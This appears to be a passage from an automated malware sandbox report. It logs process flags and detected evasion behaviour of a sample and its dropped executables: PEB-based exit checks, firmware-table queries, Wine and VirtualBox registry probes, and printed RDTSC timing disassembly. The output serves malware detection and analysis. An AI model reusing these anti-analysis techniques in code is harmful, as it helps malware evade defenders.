Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Source: C:\Users\user\Desktop\file.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Query firmware table information (likely to detect VMs)
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe System information queried: FirmwareTableInformation
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1013563001\6bf436adc7.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1013563001\6bf436adc7.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AEF427 second address: AEF42B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AEF42B second address: AEF431 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AEF431 second address: AEF436 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C69FFA second address: C69FFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C69FFE second address: C6A00A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F4DCCCB3CD6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6A327 second address: C6A352 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F4DCCF8FBC8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c jmp 00007F4DCCF8FBD7h 0x00000011 pushad 0x00000012 popad 0x00000013 push edi 0x00000014 pop edi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6A352 second address: C6A35A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6A49F second address: C6A4A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6C8DF second address: C6C8F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jnc 00007F4DCCCB3CD6h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push esi 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6C8F3 second address: C6C8F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6C8F8 second address: C6C916 instructions: 0x00000000 rdtsc 0x00000002 js 00007F4DCCCB3CDCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jnc 00007F4DCCCB3CE4h 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6C916 second address: C6C927 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F4DCCF8FBC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6C927 second address: C6C92C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6C92C second address: C6C932 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6C932 second address: C6C936 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6C97C second address: C6C981 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6C981 second address: C6C9E9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 ja 00007F4DCCCB3CD6h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push ecx 0x00000012 call 00007F4DCCCB3CD8h 0x00000017 pop ecx 0x00000018 mov dword ptr [esp+04h], ecx 0x0000001c add dword ptr [esp+04h], 00000018h 0x00000024 inc ecx 0x00000025 push ecx 0x00000026 ret 0x00000027 pop ecx 0x00000028 ret 0x00000029 mov dx, F892h 0x0000002d push 00000000h 0x0000002f jmp 00007F4DCCCB3CE2h 0x00000034 call 00007F4DCCCB3CD9h 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F4DCCCB3CE6h 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6C9E9 second address: C6CA00 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jl 00007F4DCCF8FBD4h 0x0000000f push eax 0x00000010 push edx 0x00000011 jnl 00007F4DCCF8FBC6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6CA00 second address: C6CA18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push eax 0x0000000b push edx 0x0000000c jp 00007F4DCCCB3CDCh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6CB2C second address: C6CB5F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DCCF8FBD4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a sbb edx, 337C9016h 0x00000010 lea ebx, dword ptr [ebp+1245183Ch] 0x00000016 push edi 0x00000017 mov dword ptr [ebp+122D1F16h], edi 0x0000001d pop edi 0x0000001e xchg eax, ebx 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6CB5F second address: C6CB63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6CBBE second address: C6CBE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edi 0x00000006 push eax 0x00000007 pushad 0x00000008 push edi 0x00000009 jmp 00007F4DCCF8FBD8h 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6CBE4 second address: C6CC1A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov ecx, dword ptr [ebp+122D2B66h] 0x0000000e pushad 0x0000000f mov dword ptr [ebp+122D1F16h], ecx 0x00000015 popad 0x00000016 push 00000000h 0x00000018 xor dword ptr [ebp+122D1CF0h], edi 0x0000001e push B07ED638h 0x00000023 pushad 0x00000024 jmp 00007F4DCCCB3CDAh 0x00000029 push eax 0x0000002a push edx 0x0000002b jno 00007F4DCCCB3CD6h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6CC1A second address: C6CC1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6CC1E second address: C6CC81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 add dword ptr [esp], 4F812A48h 0x0000000e push 00000000h 0x00000010 push ebx 0x00000011 call 00007F4DCCCB3CD8h 0x00000016 pop ebx 0x00000017 mov dword ptr [esp+04h], ebx 0x0000001b add dword ptr [esp+04h], 00000016h 0x00000023 inc ebx 0x00000024 push ebx 0x00000025 ret 0x00000026 pop ebx 0x00000027 ret 0x00000028 mov ecx, dword ptr [ebp+122D2E4Ah] 0x0000002e mov dword ptr [ebp+122D1D73h], ebx 0x00000034 push 00000003h 0x00000036 mov dword ptr [ebp+122D1DBEh], ebx 0x0000003c push 00000000h 0x0000003e add edi, 7E39E5EDh 0x00000044 push 00000003h 0x00000046 add ecx, dword ptr [ebp+122D1F16h] 0x0000004c push AD776B3Eh 0x00000051 jng 00007F4DCCCB3CE4h 0x00000057 push eax 0x00000058 push edx 0x00000059 jg 00007F4DCCCB3CD6h 0x0000005f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7F61E second address: C7F624 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8AE5A second address: C8AE66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8AE66 second address: C8AE6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8AE6C second address: C8AE77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push esi 0x00000008 pushad 0x00000009 popad 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8AFF4 second address: C8AFF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8B582 second address: C8B5B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F4DCCCB3CD6h 0x0000000a pop ebx 0x0000000b pushad 0x0000000c jmp 00007F4DCCCB3CE1h 0x00000011 pushad 0x00000012 popad 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 popad 0x00000016 jbe 00007F4DCCCB3CDCh 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8B5B3 second address: C8B5C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e jne 00007F4DCCF8FBC6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8B5C7 second address: C8B5CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8B5CB second address: C8B5D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8B5D1 second address: C8B5E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007F4DCCCB3CE0h 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8BCB8 second address: C8BCBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8BCBC second address: C8BCCC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F4DCCCB3CDAh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8BCCC second address: C8BCDE instructions: 0x00000000 rdtsc 0x00000002 jne 00007F4DCCF8FBCCh 0x00000008 jl 00007F4DCCF8FBC6h 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8BE1B second address: C8BE47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jc 00007F4DCCCB3CE9h 0x0000000d jmp 00007F4DCCCB3CDCh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8BE47 second address: C8BE4E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8BE4E second address: C8BE5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F4DCCCB3CD6h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8F22B second address: C8F231 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C90A26 second address: C90A32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jc 00007F4DCCCB3CD6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C929DA second address: C929E4 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F4DCCF8FBD2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C98A52 second address: C98A6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4DCCCB3CDEh 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
